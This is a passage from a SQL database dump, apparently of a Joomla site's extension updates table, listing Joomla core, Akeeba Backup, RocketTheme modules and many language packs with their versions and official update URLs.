NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15025,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15026,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15027,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(15028,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15029,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-3.html\n				',''),(15030,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15031,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15032,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15033,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15034,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15035,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15036,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15037,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15038,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15039,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15040,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15041,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15042,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15043,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15044,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15045,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15046,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15047,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15048,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15049,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15050,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15051,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15052,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15053,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15054,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15055,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15056,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15057,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15058,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15059,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15060,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15061,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15062,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15063,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15064,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15065,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15066,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15067,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15068,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15069,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15070,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15071,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15072,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15073,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15074,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15075,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15076,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.5','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15077,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15078,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15079,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15080,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15081,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15082,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15083,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15084,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15085,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15086,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15087,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15088,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15089,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15090,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15091,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15092,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15093,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15094,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15095,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15096,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15097,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15098,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(15099,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(15100,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(15101,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(15102,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(15103,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(15104,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(15105,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(15106,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15107,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15108,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15109,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15110,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15111,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15112,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15113,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15114,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15115,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15116,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15117,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15118,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15119,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15120,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15121,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15122,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15123,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15124,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15125,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15126,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15127,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15128,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15129,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15130,57,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15131,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15132,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15133,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15134,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.5','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15135,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15136,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15137,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15138,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15139,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15140,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15141,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15142,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15143,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15144,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15145,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15146,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15147,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15148,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15149,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15150,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15151,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15152,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15153,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15154,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15155,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15156,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.11','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-11.html\n				',''),(15157,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(15158,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.3','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-3.html\n				',''),(15160,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15161,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15162,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15163,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15164,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.3','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-3.html\n				',''),(15165,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15166,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15167,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15168,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15169,3,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15170,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15171,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15172,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15173,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15174,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15175,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15176,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15177,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(15178,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(15179,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(15180,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(15181,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(15182,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(15183,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(15184,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(15185,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(15186,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(15187,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(15188,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(15189,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(15190,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(15191,3,0,'English US','','pkg_en-US','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(15192,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(15193,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(15194,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(15195,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.18.5','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(15196,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(15197,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(15198,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(15199,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(15200,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(15201,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(15202,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(15203,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(15204,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(15205,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(15206,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(15207,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(15208,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(15209,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(15210,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(15211,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(15212,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(15213,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(15214,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(15215,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(15216,1,0,'Joomla','','joomla','file','',0,'3.9.18','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(15217,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(15218,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(15219,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(15220,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(15221,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(15222,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(15223,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(15224,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(15225,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(15226,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(15227,57,0,'French','','pkg_fr-FR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(15228,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(15229,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(15230,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(15231,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(15232,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(15233,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(15234,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(15235,57,0,'Chinese 